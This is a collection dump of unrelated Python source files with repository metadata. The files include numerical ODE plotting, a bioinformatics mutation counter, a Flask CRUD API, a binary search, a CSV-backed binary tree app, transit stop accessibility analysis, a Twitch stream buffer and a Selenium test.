y_n1 = y_n + 1./6. * (k1[0]+4*k2[0]+k3[0])
m_n1 = m_n + 1./6. * (k1[1]+4*k2[1]+k3[1])
return y_n1,m_n1
'''-------------------------------------------------------------------------------------------'''
'''condiciones iniciales m0=0 y0=0.1'''
m0 = 0
y0 = 0.1
n_pasos = 1000
h = 20*np.pi / n_pasos
y_1 = np.zeros(n_pasos)
m_1 = np.zeros(n_pasos)
y_1[0] = y0
m_1[0] = m0
for i in range(1,n_pasos):
(y_1[i],m_1[i]) = avanzar_rk3(y_1[i-1],m_1[i-1],h,f)
plt.figure(1)
plt.clf
plt.subplot(311)
plt.plot(y_1,m_1,color="r",label="condiciones iniciales: dy/ds=0, y=0.1")
plt.xlabel('$y$', fontsize=20)
plt.ylabel("$\\frac{dy}{ds}$",fontsize=20)
plt.legend(loc='lower right',prop={'size':10})
plt.title("Trayectoria oscilador de Van der Pol")
'''condiciones iniciales m0=0 y0=4'''
m0 = 0
y0 = 4
n_pasos = 1000
h = 20*np.pi / n_pasos
y_2 = np.zeros(n_pasos)
m_2 = np.zeros(n_pasos)
y_2[0] = y0
m_2[0] = m0
for i in range(1,n_pasos):
(y_2[i],m_2[i]) = avanzar_rk3(y_2[i-1],m_2[i-1],h,f)
plt.subplot(312)
plt.plot(y_2,m_2,color="g",label="condiciones iniciales: dy/ds=0, y=4")
plt.xlabel('$y$', fontsize=20)
plt.ylabel("$\\frac{dy}{ds}$",fontsize=20)
plt.legend(loc='lower right',prop={'size':10})
plt.subplot(313)
plt.plot(y_2,m_2,color="g",label="condiciones iniciales: dy/ds=0, y=4")
plt.plot(y_1,m_1,color="r",label="condiciones iniciales: dy/ds=0, y=0.1")
plt.xlabel('$y$', fontsize=20)
plt.ylabel("$\\frac{dy}{ds}$",fontsize=20)
plt.legend(loc='lower right',prop={'size':10})
plt.savefig("van.png")
s_values=np.linspace(1,20*np.pi,n_pasos)
plt.figure(2)
plt.subplot(211)
plt.title("y(s) para condiciones iniciales: dy/ds=0, y=0.1")
plt.plot(s_values,y_1,color="r")
plt.ylabel("y(s)")
plt.subplot(212)
plt.title("y(s) para condiciones iniciales: dy/ds=0, y=4")
plt.plot(s_values,y_2,color="g")
plt.xlabel("s")
plt.ylabel("y(s)")
plt.savefig("van2.png")
plt.show()
| true |
1bdb9503850c872b4e07ee72dd47332468be961a | Python | CTRU/HIVE-nipple | /NG_work/Scripts/Seq_varifind/seq_varfind.py | UTF-8 | 1,737 | 2.765625 | 3 | [] | no_license | #!/users/Nick/anaconda/bin/python
import re
from Bio.Alphabet import generic_dna, generic_protein
from Bio import SeqIO
import sys
import pprint
import csv
pp = pprint.PrettyPrinter(width=1)
file = str(sys.argv[1])
def compare_seqs( seq1, seq2 ):
diff_positions = []
for i in range(0, len( seq1 )):
if ( seq1[ i ] != seq2[ i ]):
difference = "%s-%s [%d]" %( seq1[i], seq2[i], (i + 1))
diff_positions.append( difference )
return ",".join( diff_positions )
# -----------------------------------------------------------------------------------------------
reference_sequence = ""
reference_name = ""
diff_found = []
for record in SeqIO.parse(open(file, 'rU'), 'fasta', generic_protein):
record_id = re.sub(r'\d+_(\d+_\d\#\d+)_\d+', r'\1', record.id)
difference_count = []
same_count = 0
if ( not reference_sequence ):
reference_sequence = record.seq
reference_name = record_id
#print ",".join([reference_name, record_id, compare_seqs(reference_sequence, record.seq)])
diff_found.append(compare_seqs(reference_sequence, record.seq))
# else :
# difference_count.append("Same_as_reference") !!!! TRYING TO APPEND TO LIST TO COUNT SAME SEQS !!!!!
print diff_found # prints the list generated!
# ---------------------------------------------------------------------------------------------
mutdic = {}
for mutation in diff_found :
if mutation in mutdic :
mutdic[mutation] += 1
else :
mutdic[mutation] = 1
# ---------------------------------------------------------------------------------------------
outfile = csv.writer(open(file + "_mutation_count.csv", "w"))
for key, value in mutdic.items():
outfile.writerow([key,value])
exit()
| true |
326c91d1f026e54aa60f417cda803ef47a9fc60b | Python | frolkin28/epam_gw | /dep_app/service/service.py | UTF-8 | 4,246 | 2.6875 | 3 | [] | no_license | '''Module for rest api resources'''
from datetime import datetime
from flask_restful import Resource, reqparse
from dep_app.models.models import Departments, Employees
from dep_app.service.schemas import DepartmentsSchema, EmployeesSchema
from dep_app import db
from sqlalchemy.sql import func
from sqlalchemy import and_
parser1 = reqparse.RequestParser()
parser1.add_argument('id')
parser1.add_argument('title')
class AverageSalary(Resource):
'''Rest api resource, which returns information about avarage salary for each department'''
def get(self):
dep = Departments.query.all()
salary = dict()
for i in dep:
average = Employees.query.with_entities(func.avg(Employees.salary)).filter(
(Employees.dep_id == i.id)).first()
if average[0]:
salary[i.id] = average[0]
return salary, 200
class DepartmentManagement(Resource):
'''Rest api resource, which provides CRUD operation with departments database table'''
def get(self, id=None, title=None):
if id:
department = Departments.query.get(id)
department_schema = DepartmentsSchema()
elif title:
department = Departments.query.filter(Departments.title == title).first()
department_schema = DepartmentsSchema()
else:
department = Departments.query.all()
department_schema = DepartmentsSchema(many=True)
res = department_schema.dump(department)
return res, 200
def post(self):
args = parser1.parse_args()
department_schema = DepartmentsSchema()
department = Departments(title=args['title'])
db.session.add(department)
db.session.commit()
res = department_schema.dump(department)
return res, 201
def put(self):
args = parser1.parse_args()
department_schema = DepartmentsSchema()
department = Departments.query.get(args['id'])
department.title = args['title']
db.session.add(department)
db.session.commit()
res = department_schema.dump(department)
return res, 200
def delete(self, id):
department_schema = DepartmentsSchema()
employees = Employees.query.filter(Employees.dep_id == id).all()
for employee in employees:
db.session.delete(employee)
db.session.commit()
department = Departments.query.get(id)
res = department_schema.dump(department)
db.session.delete(department)
db.session.commit()
return res, 200
parser2 = reqparse.RequestParser()
parser2.add_argument('id')
parser2.add_argument('name')
parser2.add_argument('dob')
parser2.add_argument('salary')
parser2.add_argument('dep_id')
class EmployeeManagement(Resource):
'''Rest api resource, which provides CRUD operation with employees database table'''
def get(self, id=None):
if id:
employee = Employees.query.get(id)
employee_schema = EmployeesSchema()
else:
employee = Employees.query.all()
employee_schema = EmployeesSchema(many=True)
res = employee_schema.dump(employee)
return res, 200
def post(self):
args = parser2.parse_args()
employee_schema = EmployeesSchema()
employee = Employees(name=args['name'], dob=datetime.strptime(args['dob'], '%Y-%m-%d').date(), \
salary=args['salary'], dep_id=args['dep_id'])
db.session.add(employee)
db.session.commit()
res = employee_schema.dump(employee)
return res, 201
def put(self):
args = parser2.parse_args()
employee = Employees.query.get(args['id'])
employee.name = args['name']
employee.dob = datetime.strptime(args['dob'], '%Y-%m-%d').date()
employee.salary = args['salary']
employee.dep_id = args['dep_id']
db.session.add(employee)
db.session.commit()
employee_schema = EmployeesSchema()
res = employee_schema.dump(employee)
return res, 200
def delete(self, id):
employee = Employees.query.get(id)
employee_schema = EmployeesSchema()
res = employee_schema.dump(employee)
db.session.delete(employee)
db.session.commit()
return res, 200
class Search(Resource):
def get(self, dep_id=None, fr=None, to=None, dob=None):
if fr and to:
employees = Employees.query.filter(Employees.dep_id == dep_id).filter(
and_(Employees.dob < to, Employees.dob > fr)).all()
elif dob:
employees = Employees.query.filter(Employees.dep_id == dep_id).filter(Employees.dob == dob).all()
employee_schema = EmployeesSchema(many=True)
res = employee_schema.dump(employees)
return res, 200
| true |
5ece0b9f42599a01e97faafcade3e18609dfa40a | Python | hussainrifat/Python-Practise | /asd.py | UTF-8 | 390 | 3.703125 | 4 | [] | no_license | A = [1,3,5,7,11,14,15,20,26,31,44,54,56,80,86]
print(A)
number=int(input("Enter the number:"))
low = 0
high = len(A)-1
while low<= high:
mid = (low + high) // 2
if A[mid] == number:
print('Found')
break
else:
if number> A[mid]:
low= mid+1
else:
high = mid-1
if low > high:
print("Not Found") | true |
7236585e329526e78168b8f32a4a4e1afaa81da8 | Python | RubensBritto/Estrutura_De_Dados | /Tree/main.py | UTF-8 | 9,900 | 3.46875 | 3 | [] | no_license |
# -*- coding: utf-8 -*-
import csv
from os import remove
from tree import BinarySearchTree
from pais import Pais
import random
import os # módulo para acessar o terminal do sistema e poder fazer a limpeza
country = Pais()
tree = BinarySearchTree()
dadosTemp = []
dados = []
def openData():
with open('datas/2015.csv', newline='') as arquivo:
leitor=csv.reader(arquivo)
leitor.__next__()
for linha in leitor:
dadosTemp.append(linha)
# saveNewDataCsv - recebe a 3árvore de dados com todas as alterações e manipulações e exportar para outro arquivo csv
def saveNewDataCsv(dadosFinal):
with open('datas/2015_1.csv', 'w', newline='') as arquivo_csv:
escrever = csv.writer(arquivo_csv)
for linha in dadosFinal:
escrever.writerow(linha)
#Da a opção de ordenação por determinados indices na tree (Rank,Qualidade de vida,Economia)
def ordenar(escolha):
if escolha == 1:
for i in range(len(dados)):
for j in range(len(dados)-1):
if int(dados[j][2]) > int(dados[j+1][2]):
temp = dados[j]
dados[j] = dados[j+1]
dados[j+1] = temp
for i in range(len(dados)):
tree.insert(dados[i][0],dados[i][1],dados[i][2],dados[i][3],dados[i][4],dados[i][5],dados[i][6],dados[i][7],dados[i][8],dados[i][9],dados[i][10],dados[i][11],escolha)
return (dados[-1][2], dados[-1][2])
if escolha == 2:
for i in range(len(dados)):
for j in range(len(dados)-1):
if float(str(dados[j][5])) > float(str(dados[j+1][5])):
temp = dados[j]
dados[j] = dados[j+1]
dados[j+1] = temp
for i in range(len(dados)):
tree.insert(dados[i][0],dados[i][1],dados[i][2],dados[i][3],dados[i][4],dados[i][5],dados[i][6],dados[i][7],dados[i][8],dados[i][9],dados[i][10],dados[i][11],escolha)
return (dados[-1][5], dados[-1][2])
if escolha == 3:
for i in range(len(dados)):
for j in range(len(dados)-1):
if float(str(dados[j][7])) > float(str(dados[j+1][7])):
temp = dados[j]
dados[j] = dados[j+1]
dados[j+1] = temp
for i in range(len(dados)):
tree.insert(dados[i][0],dados[i][1],dados[i][2],dados[i][3],dados[i][4],dados[i][5],dados[i][6],dados[i][7],dados[i][8],dados[i][9],dados[i][10],dados[i][11],escolha)
return (dados[-1][7], dados[-1][2])
def aleatorioData():
k = 0
visitados = []
while(k < 100):
valorAleatorio = random.randint(1,157)
if valorAleatorio not in visitados:
visitados.append(valorAleatorio)
#Coloca o dado de forma (e com chave) aleatória na tree
dados.append(dadosTemp[valorAleatorio])
k+=1
escolha = int(input("Como deseja ordenar os dados\n1-Rank\n2-Economia\n3- Expectativa de Vida "))
rt,rank = ordenar(int(escolha))
return (rt,escolha,rank)
# editarDado - verifica se a chave do país a ser editado existe e permite mudar seus atributos
def editarDado():
try:
id = int(input("Digite o id que deseja editar: "))
if tree.searchHappinessRank(id) == None:
print("Pais Não Existe")
else:
print('Em qual linha/coluna deseja editar um novo dado?\n1 - Pais\n2 - Regiao\n')
print('3 - Indice Felicidade\n5 - Erro Padrão\n6 - Family\n')
print('7 - Indice de liberdade\n8 - Indice de confiança\n9 - Indice de Generosidade\n10 - Distopia Residual')
choose = int(input())
if choose == 1:
editCountry = str(input('Entre com o novo nome do país: '))
if tree.searchCountry(editCountry) != None:
print("Pais já existe")
else:
tree.editarTree(id,editCountry,1)
print("editado")
return
elif choose == 2:
editRegion = str(input('Entre com a novo nome da região: '))
tree.editarTree(id,editRegion,2)
return
elif choose == 3:
editHappinessScore = float(input('Entre com o novo Indice de Felicidade: '))
tree.editarTree(id,editHappinessScore,3)
return
elif choose == 4:
editStandartError = float(input('Entre com o novo Erro Padrão: '))
tree.editarTree(id,editStandartError,4)
return
elif choose == 5:
editFamily = float(input('Entre com o novo indice "Family": '))
tree.editarTree(id,editFamily,5)
return
elif choose == 6:
editFreedom = float(input('Entre com o novo indice de liberdade: '))
tree.editarTree(id,editFreedom,6)
return
elif choose == 7:
editTrust = float(input('Entre com o novo indice de confiança: '))
tree.editarTree(id,editTrust,7)
return
elif choose == 8:
editGenerosity = float(input('Entre com o novo indice "Generosity": '))
tree.editarTree(id,editGenerosity,8)
return
elif choose == 9:
editDystopiaResidual = float(input('Entre com a nova distopia Residual: '))
tree.editarTree(id,editDystopiaResidual,9)
return
except:
print("Erro de Tipo, Tente Novamente")
editarDado()
# start - aqui são oferecidas aos usuários todas as opções disponíveis em um menu interativo
def start(retorno,escolha,rank):
print('Digite a opção desejada\n1-Criar\n2-Editar\n3-Mostrar Tree\n4-Deletar Item\n5-Exportar CSV\n6-Limpar Console\n0-Sair')
choose = int(input())
if choose == 1:
if escolha == 1:
rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual = country.insert(retorno,escolha,rank)
tree.insert(rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual,escolha)
elif escolha == 2:
rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual = country.insert(retorno,escolha,rank)
tree.insert(rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual,escolha)
else:
rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual = country.insert(retorno,escolha,rank)
tree.insert(rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual,escolha)
start(retorno,escolha,rank)
if choose == 2:
id = int(input("Digite o id que deseja editar: "))
if tree.searchHappinessRank(id) == None:
print("Pais Não Existe")
start(retorno,escolha,rank)
id,data,colum = country.editar(id)
tree.editarTree(id,data,colum)
start(retorno,escolha,rank)
if choose == 3:
tree.postorder_traversal()
start(retorno,escolha,rank)
if choose == 4:
if escolha == 1:
print("Exclusão Por ordenação de Rank")
data = int(input("Digite o indice do pais deseja remover: "))
if tree.searchHappinessRank(data) != None:
tree.removeHappinessRank(data)
print("Removido com sucesso")
start(retorno,escolha,rank)
else:
print("Pais não existe")
start(retorno,escolha,rank)
elif escolha == 2:
print("Exclusão Por ordenação de Economia")
data = float(input("Digite o indice de Economia que deseja remover: "))
if tree.searchEconomy(data) != None:
tree.removeEconomy(data)
print("Removido com sucesso")
start(retorno,escolha,rank)
else:
print("Indice não existe")
start(retorno,escolha,rank)
elif escolha == 3:
print("Exclusão Por ordenação de Expectativa de vida")
data = float(input("Digite o indice de Expectativa de vida que deseja remover: "))
if tree.searchHealth(data) != None:
tree.removeHealth(data)
print("Removido com sucesso")
start(retorno,escolha,rank)
else:
print("Indice não existe")
start(retorno,escolha,rank)
else:
print("Opção Inválida")
start(retorno,escolha,rank)
if choose == 5:
dadosFinal = []
i = 1
data = 0
while data != None:
data,j= tree.saveTree(i)
print(data)
if data != None:
dadosFinal.append(data)
i = j
i+=1
saveNewDataCsv(dadosFinal)
start(retorno,escolha,rank)
if choose == 6:
os.system('clear')
start(retorno,escolha,rank)
if choose == 0:
exit()
else:
print("Operação invalida!")
start(retorno,escolha,rank)
def main():
openData()
retorno,escolha,rank = aleatorioData()
start(retorno, escolha,rank)
if __name__ == "__main__":
main()
| true |
0d0290af2411383c20f923f6075f5ae36d66ca83 | Python | RaenonX/Madison-Metro-Sim | /msnmetrosim/controllers/stop_at_cross.py | UTF-8 | 5,431 | 2.953125 | 3 | [] | no_license | """Controller of the MMT GTFS stops grouped by its located cross."""
from typing import Dict, Optional, List, Tuple
from msnmetrosim.models import MMTStop, MMTStopsAtCross
from msnmetrosim.models.results import CrossStopRemovalResult
from msnmetrosim.utils import generate_points, Progress
from .base import LocationalDataController
from .population import PopulationDataController
from .stop import MMTStopDataController
__all__ = ("MMTStopsAtCrossDataController",)
class MMTStopsAtCrossDataController(LocationalDataController):
"""Controller of the MMT GTFS stops grouped by its located cross."""
def _init_dict_street(self, stop_data: List[MMTStop]):
# Create an intermediate grouping dict
temp = {}
for stop in stop_data:
cross_id = stop.unique_cross_id
if cross_id not in temp:
temp[cross_id] = []
temp[cross_id].append(stop)
for cross_id, stops in temp.items():
self._dict_street[cross_id] = MMTStopsAtCross(stops[0].primary, stops[0].secondary,
stops[0].wheelchair_accessible, stops)
def __init__(self, stop_data: List[MMTStop]):
self._dict_street: Dict[int, MMTStopsAtCross] = {}
self._init_dict_street(stop_data)
super().__init__(list(self._dict_street.values()))
def get_grouped_stop_by_street_names(self, street_1: str, street_2: str) -> Optional[MMTStopsAtCross]:
"""
Get the stop located at the cross of ``street_1`` and ``street_2``.
Returns ``None`` if not found.
"""
return self._dict_street.get(MMTStopsAtCross.calculate_hash(street_1, street_2))
def get_metrics_of_single_stop_removal(self, street_1: str, street_2: str, agents: List[Tuple[float, float]],
weights: Optional[List[float]] = None) \
-> CrossStopRemovalResult:
"""
Get the accessibility difference metrics of removing a single stop at ``(street_1, street_2)``.
``agents`` is a list of coordinates representing each agent for calculating the distance metrics.
Each ``weight`` corresponds to an ``agent``,
so the length of ``agents`` must equal to the length of ``weights``.
If ``agents`` is ``None``, it will be 1 for all ``agents``.
:raises ValueError: if the length of `coords` and `weights` are not the same
or no stop is located at `(street_1, street_2)`
"""
# Get the stop to be removed
target_stop = self.get_grouped_stop_by_street_names(street_1, street_2)
if not target_stop:
raise ValueError(f"There are no stops located near the cross of {street_1} & {street_2}")
self_no_target = self.duplicate(lambda data: data.unique_cross_id != target_stop.unique_cross_id)
# Get the distance metrics
metrics_before = self.get_distance_metrics_to_closest(
agents, weights=weights, name=f"Before removing {target_stop.cross_name}")
metrics_after = self_no_target.get_distance_metrics_to_closest(
agents, weights=weights, name=f"After removing {target_stop.cross_name}")
return CrossStopRemovalResult(target_stop, metrics_before, metrics_after)
def get_all_stop_remove_results(self, range_km: float, interval_km: float,
pop_data: Optional[PopulationDataController] = None) \
-> List[CrossStopRemovalResult]:
"""
Try to remove each stops one by one, and return the results of the removal.
Specify ``pop_data`` to use the population data instead of dummy agents for calculating the distances.
This function uses ``msnmetrosim.utils.generate_points()``
to generate simulated agents and to calculate the accessibility impact.
The ``center_coord`` of ``msnmetrosim.utils.generate_points()`` will be the coordinates of the stop.
Check the documentation of ``msnmetrosim.utils.generate_points()``
for more information on ``range_km`` and ``interval_km``.
WARNING: This method could be very expensive.
For 1153 records, it takes ~5 mins to run.
"""
# ThreadPoolExecutor won't help on performance boosting
ret: List[CrossStopRemovalResult] = []
total_count = len(self.all_data)
progress = Progress(total_count)
progress.start()
for stop in self.all_data:
stop: MMTStopsAtCross
agents: List[Tuple[float, float]]
weights: Optional[List[float]]
if pop_data:
lat, lon = stop.coordinate
agents, weights = pop_data.get_population_points(lat, lon, range_km, interval_km)
else:
agents = generate_points(stop.coordinate, range_km, interval_km)
weights = None
rm_result = self.get_metrics_of_single_stop_removal(stop.primary, stop.secondary, agents, weights)
ret.append(rm_result)
progress.rec_completed_one()
print(progress)
return ret
@staticmethod
def from_stop_controller(stop_ctrl: MMTStopDataController):
"""Create an :class:`MMTStopsAtCrossDataController` from :class:`MMTStopDataController`."""
return MMTStopsAtCrossDataController(stop_ctrl.all_data)
| true |
9c31c94f6e2116f520febd6f724d99a0af9cabd0 | Python | qingpeng/igs-diversity | /scripts/before-igs/pre_count.py | UTF-8 | 912 | 2.796875 | 3 | [] | no_license | #! /usr/bin/env python2
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
# using bloom filter to count unique kmers
import khmer
import sys
import screed
from screed.fasta import fasta_iter
filename = sys.argv[1]
K = int(sys.argv[2]) # size of kmer
HT_SIZE = int(sys.argv[3]) # size of hashtable
N_HT = int(sys.argv[4]) # number of hashtables
ht = khmer.new_hashbits(K, HT_SIZE, N_HT)
n_unique = 0
for n, record in enumerate(fasta_iter(open(filename))):
sequence = record['sequence']
seq_len = len(sequence)
for n in range(0, seq_len + 1 - K):
kmer = sequence[n:n + K]
if (not ht.get(kmer)):
n_unique += 1
ht.count(kmer)
print n_unique
print ht.n_occupied()
print ht.n_unique_kmers() | true |
91f39f36c538a836cab0a08f180fdddc0c43d693 | Python | nathanawmk/fidesops | /src/fidesops/util/collection_util.py | UTF-8 | 1,023 | 3.5 | 4 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | from typing import List, Dict, TypeVar, Iterable, Callable
T = TypeVar("T")
U = TypeVar("U")
def merge_dicts(dictionaries: List[Dict[T, U]]) -> Dict[T, List[U]]:
"""Convert an iterable of dictionaries to a dictionary of iterables"""
out: Dict[T, List[U]] = {k: [] for d in dictionaries for k in d.keys()}
for d in dictionaries:
for k, v in d.items():
out[k].append(v)
return out
def append(d: Dict[T, List[U]], key: T, val: U) -> None:
"""Append to values stored under a dictionary key.
append({},"A",1) sets dict to {"A":[1]}
append({"A":[1],"A",2) sets dict to {"A":[1,2]}
"""
if val:
if key in d:
d[key].append(val)
else:
d[key] = [val]
def partition(_iterable: Iterable[T], extractor: Callable[[T], U]) -> Dict[U, List[T]]:
"""partition a collection by the output of an arbitrary extractor function"""
out: Dict[U, List[T]] = {}
for t in _iterable:
append(out, extractor(t), t)
return out
| true |
e9d5aea8d1d45bde336e53f35679a46e4fa1a498 | Python | quintanaesc/CYPRobertoQE | /python/libro/problemasresueltos/capitulo2/problema2_10.py | UTF-8 | 751 | 4.15625 | 4 | [] | no_license | A=int(input("Introduce un entero positivo: "))
B=int(input("Introduce otro calor entero positivo: "))
C=int(input("Introduce un ultimo valor positivo:"))
if A>B:
if A>C:
print(f"A es el mayor con valor a {A}")
elif A==C:
print(f"A y C son iguales a {A} y son los mayores")
else:
print(f"C que vale {C} es el mayor")
elif A==B:
if A>C:
print(f"A y B son los mayores con valor {B}")
elif A==C:
print(f"A, B, y C son iguales con un valor de {A}")
else:
print(f"C es el mayor que vale {C}")
elif B>C:
print(f"B que vale {B} es el mayor")
elif B==C:
print(f"B y C son los mayores con valor {B}")
else:
print(f"C es el mayor con valor de {C}")
print("fin del programa")
| true |
94196c0d1de1fdc9ef7d17578ad6b1c9a0995229 | Python | EndyCat/Calculator | /main.py | UTF-8 | 1,117 | 3.65625 | 4 | [] | no_license | from colorama import init
from colorama import Fore, Back, Style
init()
print(Back.CYAN)
print(Fore.BLACK)
print('Приветствую в калькуляторе!')
x0 = str(input("Укажите действие которое хотите совершить (Укажите цифру рядом с которой стоит знак!)\n1. + (Плюс)\n2. - (Минус)\n3. *(Умножить)\n4. / (Делить)\n: "))
print(Back.YELLOW)
num1 = int(input("Введите первое число:"))
print(Back.RED)
num2 = int(input("Введите второе число:"))
print(Back.GREEN)
print("Ответ: ")
if "1" in x0:
x1 = int(num1) + int(num2)
print(x1)
elif "2" in x0:
x2 = int(num1) - int(num2)
print(x2)
elif "3" in x0:
x3 = int(num1) * int(num2)
print(x3)
elif "4" in x0:
x4 = int(num1) / int(num2)
print(x4)
else:
print(Back.BLUE)
print("Указаный знак не является верным, пожалуйста при вводе знака пишите число под которым он!")
kkj = input()
| true |
d7439a42c5704fab441f59691b17366d9d171750 | Python | robagliom/debates_candidatos_2015 | /segundo_debate_político.py | UTF-8 | 3,414 | 3.15625 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
########### Módulos ##############
from preprocesamiento import *
from analisis import *
from test_legibilidad import *
from matriz_candidatos import *
from distancia_coseno import *
from combinaciones import *
from comparacion_macri import *
"""
########### Fin módulos ##############
diccionario = leer_archivo("datos/ArgentinaDebate_2.pdf") #Módulo específico
for i in diccionario:
print('Cantidad de palabras dichas por',i,': ',len(diccionario[i]),'\n')
#Porcentaje de las palabras totales dichas por cada candidato
labels = [i for i in diccionario]
sizes = [len(diccionario[i]) for i in diccionario]
colors = ['gold','red']
#explode = (0, 0, 0, 0) # explode 1st slice
# Plot
plt.pie(sizes, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.title("Porcentaje de las palabras totales dichas por cada candidato")
plt.show()
#ANÁLISIS MACRI
palabras_macri = tokenizacion(diccionario['Macri'])
#Frecuencia de distribución
plot_palabras_mas_usadas(palabras_macri, 'MACRI')
#WordCloud MACRI
plot_wordcloud(palabras_macri, 'MACRI')
#ANÁLISIS SCIOLI
palabras_scioli = tokenizacion(diccionario['Scioli'])
#Frecuencia de distribución
plot_palabras_mas_usadas(palabras_scioli,'SCIOLI')
#WordCloud MACRI
plot_wordcloud(palabras_scioli,'SCIOLI')
#TEST LEGIBILIDAD CANDIDATOS
#COMENTADO HASTA VER ALGO TEÓRICO QUE JUSTIFIQUE
#test_legibilidad(diccionario)
"""
###########################################################
######### ANÁLISIS DISCURSO SEPARADO POR SECCIÓN ##########
print('** Realizamos análisis separado por sección **')
dicc_por_seccion = leer_archivo_separado("datos/ArgentinaDebate_2.pdf")
######### SECCIÓN: DESARROLLO ECONÓMICO Y HUMANO ##########
desarrollo_eco_hum = dicc_por_seccion['Desarrollo económico y humano']['Diccionario']
#preprocesamiento_coseno2(desarrollo_eco_hum,"DESARROLLO ECONÓMICO Y HUMANO: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_eco_hum,"DESARROLLO ECONÓMICO Y HUMANO: palabras compartidas entre candidatos")
######### SECCIÓN: EDUCACIÓN E INFANCIA ##########
desarrollo_edu_inf = dicc_por_seccion['Educación e infancia']['Diccionario']
#preprocesamiento_coseno2(desarrollo_edu_inf,"EDUCACIÓN E INFANCIA: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_edu_inf,"EDUCACIÓN E INFANCIA: palabras compartidas entre candidatos")
######### SECCIÓN: SEGURIDAD Y DERECHOS HUMANOS ##########
desarrollo_seg_der = dicc_por_seccion['Seguridad y derechos humanos']['Diccionario']
print(desarrollo_seg_der)
#preprocesamiento_coseno2(desarrollo_seg_der,"SEGURIDAD Y DERECHOS HUMANOS: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_seg_der,"SEGURIDAD Y DERECHOS HUMANOS: palabras compartidas entre candidatos")
######### SECCIÓN: FORTALECIMIENTO DEMOCRÁTICO ##########
desarrollo_fort_dem = dicc_por_seccion['Fortalecimiento democrático']['Diccionario']
#preprocesamiento_coseno2(desarrollo_fort_dem,"FORTALECIMIENTO DEMOCRÁTICO: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_fort_dem,"FORTALECIMIENTO DEMOCRÁTICO: palabras compartidas entre candidatos")
palabras_distintas(leer_archivo_separado("datos/Version-taquigrafica.pdf"),dicc_por_seccion) | true |
6f4df8f0c58c06b5ae7c61f4f5a8bb4ed65824ab | Python | dimorinny/twitch-fragment-upload | /twitch.py | UTF-8 | 2,729 | 2.640625 | 3 | [] | no_license | from concurrent.futures import ThreadPoolExecutor
from livestreamer import Livestreamer
from buffer import RingBuffer
from error import StreamBufferIsEmptyException
class Twitch(object):
RING_BUFFER_SIZE_KEY = 'ringbuffer-size'
OAUTH_TOKEN_KEY = 'oauth_token'
LIVESTREAMER_PLUGIN_TWITCH = 'twitch'
def __init__(self, buffer_size, resolution, oauth, channel):
self.oauth = oauth
self.resolution = resolution
self.channel = channel
self.buffer_size = buffer_size
self.buffer = RingBuffer(
buffer_size=buffer_size
)
self.initialized = False
self.stream = None
def __del__(self):
if self.initialized:
self.stream.close()
def initialize(self):
self.buffer.clear()
stream = self._init_stream(self.oauth, self.channel)
if stream:
self.initialized = True
self.stream = stream.open()
def get_stream_data(self):
if not self.initialized:
print('Read: Try to initialize')
self.initialize()
raise StreamBufferIsEmptyException
return self.buffer.read_all()
def update_stream_data(self):
if self.initialized:
data = self.stream.read(self.buffer_size)
print('Update: {length}'.format(length=len(data)))
if len(data) != 0:
self.buffer.write(data)
else:
print('Update: Try to initialize')
self.initialize()
else:
print('Update: Try to initialize')
self.initialize()
def stream_initialized(self):
return self.stream is not None
def _init_stream(self, oauth, channel):
session = Livestreamer()
session.set_plugin_option(
self.LIVESTREAMER_PLUGIN_TWITCH,
self.OAUTH_TOKEN_KEY,
oauth
)
session.set_option(self.RING_BUFFER_SIZE_KEY, self.buffer_size)
streams = session.streams(self._generate_stream_url(channel))
return streams.get(self.resolution)
@staticmethod
def _generate_stream_url(channel):
return 'https://www.twitch.tv/{channel}'.format(channel=channel)
class AsyncTwitchWrapper(object):
def __init__(self, loop, twitch):
self.executor = ThreadPoolExecutor()
self.loop = loop
self.twitch = twitch
def initialize(self):
self.twitch.initialize()
async def get_stream_data(self):
return await self.loop.run_in_executor(self.executor, self.twitch.get_stream_data)
async def update_stream_data(self):
await self.loop.run_in_executor(self.executor, self.twitch.update_stream_data)
| true |
55e129c4a43339457e1ec99edc8110f486a318af | Python | juselius/python-tutorials | /TextParsing/manyfiles/grabnumbers.py | UTF-8 | 410 | 2.96875 | 3 | [] | no_license | import os
filenames = os.listdir(".")
#print filenames
runtimes = list()
for f in filenames:
for line in file(f, "r").readlines():
if line.startswith("WR12L2C2"):
#print line
linetokens = line.strip().split()
#print linetokens[5]
runtimes.append(float(linetokens[5]))
runtimes.sort()
print "min=", runtimes[0], "max=", runtimes[-1] | true |
e503f2617ec2af07868cfb1ab653893f39bca29d | Python | silverhorn/AutomationTestPython | /firsttest.py | UTF-8 | 4,822 | 3.375 | 3 | [] | no_license | from selenium import webdriver
import time
import unittest
from pomfirstpage import Firstassessmen
"""
This class consist of tests. It inherits unittest.TestCase class. Also consist setUp and tearDown methods which are
used to set up test with necessarily preconditions which will be executed before each test and to set up conditions
which will be executed after each test
"""
class CheckTest(unittest.TestCase): #Class name
baseURL = "https://www.ultimateqa.com/filling-out-forms/" # Storing the URL into var
basePath = "C:/Python37-32/automation/driver/chromedriver.exe" # Storing the path to chrome driver into var
@classmethod
def setUp(self):
self.driver = webdriver.Chrome(self.basePath)
self.driver.implicitly_wait(5) # Setting implicitly wait to 5 sec
self.driver.maximize_window() # Maximizing the window after launching the Chrome browser
def tearDown(self):
self.driver.quit()
""" This test will fill out form but in the 'Result' field will pass negative 1 which will result in the error msg.
At the end it verifies that sum expression before clicking on the 'Submit' button is different that sum expression
